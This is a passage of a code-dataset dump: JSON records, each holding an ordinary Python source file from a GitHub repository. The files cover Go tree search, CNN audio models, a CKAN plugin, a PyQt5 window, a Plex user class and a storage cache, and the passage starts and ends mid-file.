as exception:\n print(f\"Subprocess output for {exception} was {exception.output}\")\n raise exception\n\n # and exit..\n\n\ndef main():\n \"\"\"\n Simple main routine\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Start up dask cluster on multiple machines, using a wireguard VPN for communication')\n parser.add_argument(\"--cluster_name\", \"-n\", required=True, help=\"a unique name to identify this cluster\")\n parser.add_argument(\"--port\", \"-p\", required=True, type=int, default=51820, choices=range(51820, 51841), help=\"port number the wireguard network should use everywhere (51820-51840, because ECMWF firewall limits this)\")\n parser.add_argument(\"hosts\", nargs=\"+\", help=\"hosts expressed as pool_name@userid@host for connecting to using ssh, e.g. EUM@dasktest@64.225.133.132\")\n\n args = parser.parse_args()\n\n spawn_dask_cluster(args.hosts, args.port, proj_name=args.cluster_name)\n\nif __name__ == '__main__':\n main()\n","repo_name":"wekeo/multicloud","sub_path":"cluster/spawn_multi_cloud_dask.py","file_name":"spawn_multi_cloud_dask.py","file_ext":"py","file_size_in_byte":14476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22637903601","text":"import logging\nfrom config import ARCH_SPACE, QUAN_SPACE\n\n\ndef get_logger(filepath=None):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(console_handler)\n if filepath is not None:\n file_handler = logging.FileHandler(filepath+'.log', mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter('%(message)s'))\n logger.addHandler(file_handler)\n return logger\n\n\ndef split_paras(paras):\n num_layers = len(paras)\n arch_paras = []\n quan_paras = []\n for i in range(num_layers):\n para = paras[i]\n arch_para = {}\n quan_para = {}\n for name, _ in ARCH_SPACE.items():\n if name in para:\n arch_para[name] = para[name]\n if 'anchor_point' in para:\n arch_para['anchor_point'] = para['anchor_point']\n for name, _ in QUAN_SPACE.items():\n if name in para:\n quan_para[name] = para[name]\n if arch_para != {}:\n arch_paras.append(arch_para)\n if quan_para != {}:\n quan_paras.append(quan_para)\n if arch_paras == []:\n arch_paras = None\n if quan_paras == []:\n quan_paras = None\n return arch_paras, quan_paras\n\n\ndef combine_rollout(arch_rollout, quan_rollout, num_layers):\n arch_num_paras_per_layer = int(len(arch_rollout) / num_layers)\n quan_num_paras_per_layer = int(len(quan_rollout) / num_layers)\n result = []\n for i in range(num_layers):\n result += arch_rollout[i * arch_num_paras_per_layer:\n arch_num_paras_per_layer * (i + 1)]\n result += quan_rollout[i * quan_num_paras_per_layer:\n quan_num_paras_per_layer * (i + 1)]\n return result\n\n\nclass BestSamples(object):\n def __init__(self, length=5):\n self.length = length\n self.id_list = [i for i in range(length)]\n self.rollout_list = [[] for _ in range(length)]\n self.reward_list = [-1 for _ in range(length)]\n\n def register(self, id, rollout, reward):\n for i in range(self.length):\n if reward > self.reward_list[i]:\n self.id_list = self.insert(id, self.id_list, i)\n self.rollout_list = self.insert(rollout, self.rollout_list, i)\n self.reward_list = self.insert(reward, self.reward_list, i)\n break\n \n def insert(self, data, t_list, index):\n if index >= len(t_list):\n return 
t_list\n else:\n t_list = t_list[:-1]\n t_list = t_list[:index] + [data] + t_list[index:]\n return t_list\n\n def __repr__(self):\n return str(dict(zip(self.id_list, self.reward_list)))\n\n\n\nif __name__ == '__main__':\n arch_rollout = [3, 3, 0, 0, 0, 1, 2, 2, 1, 0, 2, 1, 2, 0, 1, 2, 2, 1, 3, 3, 1, 1, 3, 0, 1, 2, 0, 2, 0, 1, 3, 2, 2, 2, 1, 1]\n quan_rollout = [2, 1, 3, 4, 0, 0, 0, 6, 3, 2, 0, 4, 2, 4, 1, 2, 0, 2, 1, 1, 3, 6, 1, 2]\n combine_rollout(arch_rollout, quan_rollout, 6)\n best_samples = BestSamples(5)\n i = [1,2,3,4,5]\n r = [2,3,4,12,23]\n ro = [[1],[2],[3],[4],[5]]\n print(best_samples)\n for id in range(len(i)):\n best_samples.register(i[id], ro[id], r[id])\n print(best_samples)\n\n\n\n","repo_name":"MariusAnje/CIM_CW","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"17636158117","text":"def input_coordinate():\n\twhile True:\n\t\tcoordinate=input(\"input coordinates for ex. 1,2\\n\")\n\t\tlista=coordinate.split(\",\")\n\t\tif len(lista)==2:\n\t\t\tif 0<int(lista[0])<=3 and 0<int(lista[1])<=3:\n\t\t\t\treturn lista\n\t\t\telif int(lista[0])>3 or int(lista[1])>3:\n\t\t\t\tprint(\"to big numbers\")\n\t\telif len(lista)>2:\n\t\t\tprint(\"wrong input\")\n\t\telse:\n\t\t\tprint(\"wrong input\")","repo_name":"bubik098/game2","sub_path":"input_coordinate.py","file_name":"input_coordinate.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"17359868129","text":"import random\nimport sys\nfrom collections import defaultdict\nimport math\nfrom copy import deepcopy\nfrom myGo import GO\n\n\nclass GoNode:\n def __init__(self, go, parent=None, action=None):\n assert go\n self.go = go # current GO instance\n self.parent = parent # parent node of this node\n self.action = action # the action taken by its parent node to get to this node\n self.children = [] # children nodes\n self._number_of_visits = 0. 
# n\n self._results = defaultdict(int) # index 1 for winning times of black, 2 for white, 0 for draw\n self._untried_actions = None # valid moves for current GO instance\n\n def untried_actions(self): # return all valid position for next move\n if self._untried_actions is None:\n self._untried_actions = self.go.get_legal_actions()\n return self._untried_actions # init once, every next call it returns the list\n\n def q(self):\n wins = self._results[self.go.piece_type]\n loses = self._results[3 - self.go.piece_type]\n return wins - loses\n\n def n(self):\n return self._number_of_visits + 1\n\n def expand(self):\n '''\n create a child node for current node\n :return: a newly-created child node\n '''\n (i, j) = self.untried_actions().pop() # pop the first valid position from the list\n next_go = self.go.move(i, j)\n assert next_go is not None\n child_node = GoNode(\n next_go, parent=self, action=(i, j)\n )\n self.children.append(child_node)\n return child_node # return this expanded child node\n\n def is_fully_expanded(self):\n return len(self.untried_actions()) == 0\n\n def is_terminal_node(self): # check if this is a leaf node (end of the game)\n '''\n\n :param action: the action taken from the parent node to get to this node\n :return: True if this is the end of game (current node is a leaf node)\n '''\n return self.go.is_game_over()\n\n def best_child(self, c_param=0.3):\n choices_weights = [\n (c.q() / c.n()) + c_param * math.sqrt((math.log(self.n() + 1) / c.n()))\n for c in self.children\n ]\n return self.children[choices_weights.index(max(choices_weights))]\n\n def rollout(self):\n '''\n go down through this node, simulate opponent's move by randomly choosing\n :return: result of simulation. 1 if black wins, 2 if white wins, 0 for draw\n '''\n current_go = self.go\n while not current_go.is_game_over():\n possible_moves = current_go.get_legal_actions() # could be an empty set\n if len(possible_moves) == 0: # leaf node, break the loop\n break # the board does not change if we pass\n (i, j) = possible_moves[random.randint(0, len(possible_moves) - 1)]\n current_go = current_go.move(i, j) # n_move + 1, switch piecetype\n return current_go.game_result() # return 1 if black wins, 2 if white wins, 0 for draw\n\n def backpropagate(self, result):\n '''\n\n :param result: 1 if black wins, 2 if white wins, 0 for draw\n :return: None\n '''\n self._number_of_visits += 1\n reward = 3 if result == 1 else 1\n self._results[result] += reward\n if self.parent:\n self.parent.backpropagate(result)","repo_name":"Antares-97/USC","sub_path":"cs561/hw2/hw2/my_node.py","file_name":"my_node.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"31355174169","text":"\"\"\"\nResponsible for destroying tiles after matches.\n\nHandles clearing out rows / cols after 4+ matches, but not placing crits.\n\nAlso does not let tiles fall--gravity.py handles that.\n\"\"\"\n\nfrom constants import MIN_DESTROY_ROW_OR_COL\nfrom match import find_matches\nfrom tiles import EmptyTile\n\n\ndef destroy_tiles(board):\n \"\"\"\n Return a copy of `board` with matched tiles (and rows / cols with 4+\n matches) destroyed.\n\n Does not modify `board` (which is important so that the original board,\n along with the returned list of destroyed tiles, can be used to figure out\n AP, traps, etc.)\n\n Note that this function will have no effect if there are no matches on the\n board. It's up to other code to e.g. 
enforce that a move creates at least\n one match.\n\n Returns:\n\n - a new copy of the board with EmptyTiles in place of destroyed tiles\n\n - a sorted list of the squares (as (row, col) tuples) that were replaced\n with empty tiles\n \"\"\"\n new_board = board.copy()\n matches = find_matches(new_board)\n\n destroyed = set()\n\n for match in matches:\n for (row, col) in match.squares:\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n extents = match.max_extents\n\n for (row, col) in _destroy_rows(new_board, extents['rows']):\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n for (row, col) in _destroy_cols(new_board, extents['cols']):\n new_board.set_at(row, col, EmptyTile())\n destroyed.add((row, col))\n\n return new_board, sorted(list(destroyed))\n\n\ndef _destroy_rows(board, row_extents):\n rows_to_destroy = (row\n for (row, ext)\n in row_extents.items()\n if ext >= MIN_DESTROY_ROW_OR_COL)\n for row in rows_to_destroy:\n for col in range(board.side):\n yield (row, col)\n\n\ndef _destroy_cols(board, col_extents):\n cols_to_destroy = (col\n for (col, ext)\n in col_extents.items()\n if ext >= MIN_DESTROY_ROW_OR_COL)\n for col in cols_to_destroy:\n for row in range(board.side):\n yield (row, col)\n","repo_name":"tomheon/hazardchamber","sub_path":"tile_destroyer.py","file_name":"tile_destroyer.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34264357988","text":"\"\"\"\n 生成梅尔频谱\n\"\"\"\n\nimport librosa.display\nimport matplotlib.pyplot as plt\nimport os\nimport glob\n\nROOT_PATH = 'D:\\\\ballroom\\\\'\nOUT_PATH = 'D:\\\\ballroomMelSpec\\\\'\ncounts = {}\n\n\ndef genMelSpec(music_path, type_name, time):\n count = counts.get(type_name, 1)\n counts[type_name] = count + 1\n\n dir_path = os.path.join(OUT_PATH, type_name)\n if not os.path.exists(OUT_PATH):\n os.mkdir(OUT_PATH)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n y, sr = librosa.load(music_path, offset=time, duration=10)\n melspec = librosa.feature.melspectrogram(y, sr)\n logspec = librosa.power_to_db(melspec)\n fig = plt.figure()\n plt.axis('off')\n librosa.display.specshow(logspec, sr=sr)\n save_path = os.path.join(dir_path, type_name + \"{}.jpg\".format(str(count).zfill(6)))\n plt.savefig(save_path, bbox_inches='tight', pad_inches=0)\n plt.close(fig)\n\n\n# librosa.display.specshow(logspec, x_axis='time', y_axis='mel', sr=sr)\n# plt.title('Mel-Spectrum')\n# plt.colorbar(format='%+2.0f dB')\n# plt.tight_layout()\n# plt.show()\n\nif __name__ == '__main__':\n all_music_list = glob.glob(os.path.join(ROOT_PATH, '*\\\\*.wav'))\n for i, music_path in enumerate(all_music_list):\n type_name = music_path.split('\\\\')[-2]\n genMelSpec(music_path, type_name, 0)\n genMelSpec(music_path, type_name, 10)\n genMelSpec(music_path, type_name, 20)\n print('Now Execute ==>', i + 1, '/', len(all_music_list))\n","repo_name":"wangz1024/music-similarity","sub_path":"MelSpec.py","file_name":"MelSpec.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"7981979453","text":"import ctypes\r\n\r\nfrom . import run_solo_function\r\nfrom . import DataPair, masked_op\r\nfrom . 
import aliases\r\n\r\nse_assign_value = aliases['assign_value']\r\n\r\n\r\ndef assign_value(input_list_data, bad, constant, bad_flag_mask, dgi_clip_gate=None, boundary_mask=None):\r\n \"\"\" \r\n For masked values, assign it to the defined \"constant\" value\r\n \r\n Args:\r\n input_list_data: Input float list\r\n bad: Float representing bad value.\r\n constant: Float value representing what masked values should become\r\n bad_flag_mask: A mask for input_list marking good or bad values.\r\n (optional) dgi_clip_gate: An integer determines the end of the ray (default: length of input_list)\r\n (optional) boundary_mask: Defines region over which operations will be done. (default: all True).\r\n\r\n Returns:\r\n Numpy masked array: Contains an array of data, mask, and fill_value of results.\r\n\r\n Throws:\r\n ValueError: if input_list and input_boundary_mask are not equal in size.\r\n\r\n \"\"\"\r\n\r\n args = {\r\n \"constant\" : DataPair.DataTypeValue(ctypes.c_float, constant),\r\n \"data\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_float), input_list_data),\r\n \"newData\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_float), None),\r\n \"nGates\" : DataPair.DataTypeValue(ctypes.c_size_t, None),\r\n \"dgi_clip_gate\" : DataPair.DataTypeValue(ctypes.c_size_t, dgi_clip_gate),\r\n \"boundary_mask\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_bool), boundary_mask),\r\n \"bad_flag_mask\" : DataPair.DataTypeValue(ctypes.POINTER(ctypes.c_bool), bad_flag_mask),\r\n }\r\n\r\n return run_solo_function(se_assign_value, args)\r\n\r\n\r\ndef assign_value_masked(masked_array, constant, boundary_mask=None):\r\n \"\"\" \r\n For masked values, assign it to the defined \"constant\" value\r\n \r\n Args:\r\n masked_array: A numpy masked array data structure,\r\n constant: Float value representing what masked values should become\r\n\r\n Returns:\r\n Numpy masked array\r\n\r\n Throws:\r\n ModuleNotFoundError: if numpy is not installed\r\n AttributeError: if masked_array arg is not a numpy masked array.\r\n \"\"\"\r\n return masked_op.masked_func(assign_value, masked_array, constant, boundary_masks = boundary_mask, usesBadFlags=True)\r\n","repo_name":"NCAR/lrose-solo-python","sub_path":"src/pysolo/solo_functions/flags/solo_assign_value.py","file_name":"solo_assign_value.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"70521776191","text":"import ckan.plugins as plugins\nimport ckan.plugins.toolkit as toolkit\nfrom collections import OrderedDict\n\n# Debug\nimport logging\nimport pprint\nlog = logging.getLogger(__name__)\n\n\ndef getCustomFacets(facets_dict):\n ''' Customize facets on dataset search page and organization page.\n '''\n #log.debug(\"facets_dict:\")\n #log.debug(pprint.pformat(facets_dict))\n\n # Remove facet \"groups\"\n if 'groups' in facets_dict:\n del facets_dict['groups']\n\n # Remove facet \"license_id\"\n if 'license_id' in facets_dict:\n del facets_dict['license_id']\n\n # Add facet \"Resource Type\" \n facets_dict['resource-type'] = plugins.toolkit._('Resource Type')\n\n # Move Formats facet to the end. 
\n if 'res_format' in facets_dict:\n del facets_dict['res_format']\n facets_dict['res_format'] = plugins.toolkit._('Formats')\n\n return facets_dict\n\n\nclass Custom_ThemePlugin(plugins.SingletonPlugin):\n plugins.implements(plugins.IConfigurer)\n plugins.implements(plugins.IFacets, inherit=True)\n\n # IConfigurer\n\n def update_config(self, config_):\n toolkit.add_template_directory(config_, 'templates')\n toolkit.add_public_directory(config_, 'public')\n toolkit.add_resource('fanstatic', 'custom_theme')\n\n ## IFacets \n\n def dataset_facets(self, facets_dict, package_type):\n custom_facets_dict = getCustomFacets(facets_dict)\n return custom_facets_dict\n\n def organization_facets(self, facets_dict, organization_type, package_type):\n custom_facets_dict = getCustomFacets(facets_dict)\n return custom_facets_dict\n","repo_name":"christygrant/ckanext-custom_theme","sub_path":"ckanext/custom_theme/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16214186293","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt \r\n\r\ndata = pd.read_csv('sample_size_validation_results.csv')\r\n\r\nelcc = data['ELCC'].values \r\niterations = data['iterations'].values \r\nregions = data['region'].values\r\n\r\n\r\n# plot\r\nfig, ax = plt.subplots()\r\n\r\nregion_names = np.unique(regions)\r\nfor region in region_names:\r\n ax.scatter(iterations[regions == region],elcc[regions == region],alpha=.2)\r\n\r\nax.set_ylim([0,40])\r\nax.set_ylabel('ELCC')\r\nax.set_xlabel('MCS Sample Size')\r\nax.set_title('ELCC of 1 GW Solar in SLC, UT \\n Sample Size Validation')\r\n\r\nplt.legend([region.replace('[','').replace(']','').replace('\\'','') for region in region_names])\r\nplt.savefig('sample_size_validation')","repo_name":"julflore000/WECC-Paper-Results","sub_path":"sample_size_validation/plot_sample_size.py","file_name":"plot_sample_size.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42511018423","text":"import numpy as np\n\nA = np.array([[1, 2, 3], [4, 5, 6]])\nB = np.array([[-1, -2, -3], [-4, -5, -6]])\n\n# matrix A, B 형상 출력\nprint('A.shape ==', A.shape, ', B.shape ==', B.shape)\n\n# matrix A, B 차원 출력\nprint('A.ndim ==', A.ndim, ', B.ndim ==', B.ndim)\n","repo_name":"ZeroMin-K/Machine_Learning","sub_path":"basic_concepts/numpy_matrix.py","file_name":"numpy_matrix.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39246743864","text":"class User(object):\n \"\"\"An object representing a Plex user.\"\"\"\n\n def __init__(self, data, machine_id=None):\n self.machine_identifier = machine_id\n #: :obj:`str`: the users id.\n self.id = data['id']\n #: :obj:`str`:\n self.uuid = data['uuid']\n #: :obj:`bool`: the users admin status.\n self.admin = bool(int(data['admin']))\n #: :obj:`bool`: the users guest status.\n self.guest = bool(int(data['guest']))\n #: :obj:`bool`:\n self.restricted = bool(int(data['restricted']))\n #: :obj:`bool`: True if the user has a pin.\n self.protected = bool(int(data['protected']))\n #: :obj:`str`: the users name.\n self.title = data['title']\n #: :obj:`str`: the users plex username.\n self.username = data['username']\n #: :obj:`str`: the users email.\n self.email = data['email']\n #: :obj:`str`: URL to the users 
avatar.\n self.thumb = data['thumb']\n\n def __repr__(self):\n return '<{}: {}>'.format(self.__class__.__name__, self.title)\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n return False\n","repo_name":"coryo/plexdevices","sub_path":"plexdevices/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"}
{"seq_id":"38569485095","text":"\"\"\"added new version\n\nRevision ID: 5950ebb63cfa\nRevises: 0b3af8141af4\nCreate Date: 2022-05-03 14:56:12.499750\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5950ebb63cfa'\ndown_revision = '0b3af8141af4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('films', sa.Column('test', sa.Float(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('films', 'test')\n # ### end Alembic commands ###\n","repo_name":"shkolnaya/films_api","sub_path":"migrations/versions/5950ebb63cfa_added_new_version.py","file_name":"5950ebb63cfa_added_new_version.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"22155454867","text":"from itertools import count,chain\nimport heapq\nfrom functools import wraps\nfrom time import time\n\ndef timer(func):\n # define a function within a function, and call it with a decorator (@timer)\n # Takes any amount of arguments: args = arguments, kwargs = keyword arguments\n def wrapper(*args, **kwargs):\n start_time = time()\n result = func(*args, **kwargs)\n print(f\"\\nTime required: {(time() - start_time)*1000:.2f} ms\")\n return result\n return wrapper\n\ndef to_int(str_list):\n for i, item in enumerate(str_list):\n try:\n str_list[i] = int(float(item))\n except ValueError:\n str_list[i] = item\n return str_list\n\ndef shortest_path(grid):\n y_size, x_size = len(grid),len(grid[0])\n paths = [(0,0,0)] # total, y, x\n visited = [[0] * len(row) for row in grid]\n while True:\n total, y, x = heapq.heappop(paths) # Get coordinates for lowest path\n if visited[y][x]: continue\n if (y, x) == (y_size - 1, x_size - 1):\n return total\n visited[y][x] = 1\n for ny, nx in [(y+1, x), (y, x+1), (y-1, x), (y, x-1)]: # prefer down and right\n if not y_size > ny >= 0 <= nx < x_size: continue\n if visited[ny][nx]: continue\n heapq.heappush(paths, (total + grid[ny][nx], ny, nx))\n\n\ndef string_print(grid, spacer=''):\n for line in grid:\n print(spacer.join(str(x) for x in line))\n print()\n\n\ndef print_dict(im, spacer=''): # Render image from dict with y,x coordinates\n y_min,y_max = min([a[0] for a in im.keys()]),max([a[0] for a in im.keys()])\n x_min,x_max = min([a[1] for a in im.keys()]),max([a[1] for a in im.keys()])\n\n image = [['.'] * (x_max-x_min +1) for _ in range((y_max-y_min + 1))]\n for y,x in im:\n image[y-y_min][x-x_min] = im[(y,x)]\n\n for line in image:\n print(spacer.join(str(x) for x in line))\n print()\n\ndef expanding_range(x0):\n down = count(x0, -1)\n up = count(x0 + 1)\n return chain.from_iterable(zip(down, up))\n\n\ndef expanding_range_2d(x0, y0):\n yield x0, y0\n for radius in count(1):\n for i in range(-radius, radius):\n yield x0+i, y0-radius\n yield x0+radius, y0+i\n yield x0-i, y0+radius\n yield 
x0-radius, y0-i\n\n\ndef expanding_manhattan_2d(x0, y0):\n yield x0, y0\n for radius in count(1):\n for i in range(radius):\n j = radius - i\n yield x0+i, y0-j\n yield x0+j, y0+i\n yield x0-i, y0+j\n yield x0-j, y0-i\n\n\n","repo_name":"aufbakanleitung/advent-of-code","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"24315250486","text":"from math import fabs, fmod, sqrt, sin, pi\n\ndef f(x):\n global a, n, v\n return a * sin(2 * pi * n * x / v)\n\ndef compute_arclength():\n x = 0\n l = 0.0\n dx = 0.0001\n while x <= v / (4 * n):\n dy = fabs(f(x) - f(x + dx))\n l += sqrt(dx * dx + dy * dy)\n x += dx\n return l\n\n\ntokens = input().split(maxsplit=2)\nwhile len(tokens) == 3:\n w, v, n = float(tokens[0]), float(tokens[1]), int(tokens[2])\n lo = 0\n hi = sqrt(w ** 2 - v ** 2) / (2 * n)\n target = w / n\n eps = 0.1\n while eps > 0.00001:\n a = (lo + hi) / 2\n l = compute_arclength() * 4\n if l >= target:\n hi = a\n else:\n lo = a\n eps = fabs(target - l)\n print(\"{:.3f}\".format(a - fmod(a, 0.001)))\n tokens = input().split(maxsplit=2)\n","repo_name":"kitihounel/competitive-programming-africa","sub_path":"south-africa/2016/scrunched.tle.py","file_name":"scrunched.tle.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"4525030869","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom modules import ConvBlock, FullyConnectedBlock\n\n\nclass CNNModel(nn.Module):\n def __init__(self):\n super(CNNModel, self).__init__()\n self.feature = nn.Sequential(\n ConvBlock(input_channel=1, output_channel=32),\n ConvBlock(input_channel=32, output_channel=64),\n ConvBlock(input_channel=64, output_channel=128),\n ConvBlock(input_channel=128, output_channel=128),\n nn.Flatten()\n )\n\n self.class_classifier = nn.Sequential(\n FullyConnectedBlock(in_features=10752, out_features=512),\n nn.Dropout(p=0.5),\n FullyConnectedBlock(in_features=512, out_features=64),\n nn.Dropout(p=0.5),\n FullyConnectedBlock(in_features=64, out_features=10)\n )\n\n def forward(self, x):\n x = self.feature(x)\n x = self.class_classifier(x)\n return x\n\n\nclass CNNModelTiny(nn.Module):\n def __init__(self):\n super(CNNModelTiny, self).__init__()\n self.conv1 = nn.Conv2d(1, 16, 3, stride=1, padding=0)\n self.bn1 = nn.BatchNorm2d(16)\n self.pool1 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv2 = nn.Conv2d(16, 32, 3, stride=1, padding=0)\n self.bn2 = nn.BatchNorm2d(32)\n self.pool2 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv3 = nn.Conv2d(32, 64, 3, stride=1, padding=0)\n self.bn3 = nn.BatchNorm2d(64)\n self.pool3 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=0)\n self.bn4 = nn.BatchNorm2d(64)\n self.pool4 = nn.MaxPool2d(kernel_size=(2, 2))\n\n self.flatten = nn.Flatten()\n\n self.fc1 = nn.Linear(in_features=256, out_features=64)\n self.bn6 = nn.BatchNorm1d(num_features=64)\n self.d2 = nn.Dropout(p=0.5)\n self.fc3 = nn.Linear(in_features=64, out_features=10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.pool1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = self.bn2(x)\n x = self.pool2(x)\n x = F.relu(x)\n x = self.conv3(x)\n x = self.bn3(x)\n x = self.pool3(x)\n x = F.relu(x)\n x = self.conv4(x)\n x = self.bn4(x)\n x = self.pool4(x)\n x = F.relu(x)\n\n x = self.flatten(x)\n x = 
self.fc1(x)\n x = self.bn6(x)\n x = F.relu(x)\n x = self.d2(x)\n x = self.fc3(x)\n return x\n\n\ndef test():\n sample_input = torch.rand((2, 1, 65, 65))\n model = CNNModelTiny()\n y = model(sample_input)\n print(y.shape)\n\n\nif __name__ == '__main__':\n test()","repo_name":"Subrata132/key_word_spotting","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30735685995","text":"import sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget\r\n\r\n\r\ndef set_window_size():\r\n\r\n app = QApplication(sys.argv)\r\n\r\n w = QWidget()\r\n\r\n # 设置窗口标题\r\n w.setWindowTitle(\"演示窗口\")\r\n\r\n # 窗口的大小\r\n w.resize(800, 500)\r\n\r\n # 展示窗口\r\n w.show()\r\n\r\n # 程序进行循环等待状态\r\n app.exec()\r\n\r\n\r\nif __name__ == '__main__':\r\n set_window_size()","repo_name":"Zyg8420/PyQT5","sub_path":"04 调整窗口大小.py","file_name":"04 调整窗口大小.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34181368867","text":"import hashlib\nimport os\nfrom typing import Optional, Set, Callable, cast\n\nimport cachetools\n\nfrom ImageSaverLib.MetaDB.Errors import NotExistingException\nfrom ImageSaverLib.MetaDB.MetaDB import MetaDBInterface\nfrom ImageSaverLib.MetaDB.Types.Resource import ResourceName, ResourceSize, ResourceHash\nfrom ImageSaverLib.Storage.FileSystemStorage import FileSystemStorage2\nfrom ImageSaverLib.Storage.StorageInterface import StorageInterface, SizableStorageInterface\nfrom .LCMeta.LCMetaInterface import LCMetaInterface\nfrom .LCMeta.ResourceAlias import ResourceNameAlias\nfrom .LCMeta.db_inits import makeSQLiteMeta, makeSQLiteRamMeta\nfrom ..CacheInterface import CacheInterface\nfrom ...Errors import StorageError, DownloadError\n\n\nclass _CallbackCache(cachetools.LFUCache):\n\n def __init__(self, maxsize, getsizeof=None):\n super().__init__(maxsize, getsizeof)\n self.on_delete = None # type: Optional[Callable[[ResourceName], None]]\n\n def __delitem__(self, key, cache_delitem=cachetools.Cache.__delitem__):\n super().__delitem__(key, cache_delitem)\n if self.on_delete:\n self.on_delete(key)\n\n\nclass LocalCache(StorageInterface, CacheInterface):\n def __init__(self, meta, storage, cache_size=50, cache_dir='~/.isl/.isl_cache', ram_cache_meta=False, debug=False):\n # type: (MetaDBInterface, StorageInterface, int, str, bool, bool) -> None\n StorageInterface.__init__(self, debug)\n CacheInterface.__init__(self, storage)\n self._cache_workdir = os.path.abspath(os.path.normpath(os.path.expanduser(cache_dir)))\n self._cache_storage_workdir = os.path.join(self._cache_workdir, 'storage')\n os.makedirs(self._cache_storage_workdir, exist_ok=True)\n self._cache_meta_workdir = os.path.join(self._cache_workdir, 'cache_meta')\n os.makedirs(self._cache_meta_workdir, exist_ok=True)\n self._cache_meta_path = os.path.join(self._cache_meta_workdir, 'cache_meta.sqlite')\n self._meta = meta\n self._local_storage = FileSystemStorage2(self._cache_storage_workdir, debug=debug)\n if ram_cache_meta:\n self._cache_meta = makeSQLiteRamMeta(echo=False)\n else:\n self._cache_meta = makeSQLiteMeta(self._cache_meta_path, echo=False)\n self._cache_size = cache_size\n self._cache = _CallbackCache(self._cache_size)\n self._cache.on_delete = lambda key: self._on_delete(key)\n self._resource_names = None # type: Optional[Set[ResourceName]]\n unreferenced_resources = 
set(self._local_storage.listResourceNames()).difference(\n set((a for _, a in self._cache_meta.getAllResourceNamesWithAliases())))\n for r in unreferenced_resources:\n self._local_storage.deleteResource(r)\n for r, a in self._cache_meta.getAllResourceNamesWithAliases():\n self._cache[r] = a\n\n def closeCacheMeta(self):\n self._cache_meta.close()\n\n def supportsWrapType(self, wrap_type):\n return self.wrapped_storage.supportsWrapType(wrap_type)\n\n def getMaxSupportedResourceSize(self):\n return self.wrapped_storage.getMaxSupportedResourceSize()\n\n def getRequiredWrapType(self):\n return self.wrapped_storage.getRequiredWrapType()\n\n def identifier(self):\n return self.wrapped_storage.identifier()\n\n def _on_delete(self, resource_name):\n if self._cache_meta.hasAliasForResourceName(resource_name):\n alias = self._cache_meta.getAliasOfResourceName(resource_name)\n try:\n self._local_storage.deleteResource(alias)\n except StorageError:\n pass\n self._cache_meta.removeAliasOfResourceName(resource_name)\n\n def loadRessource(self, resource_name):\n 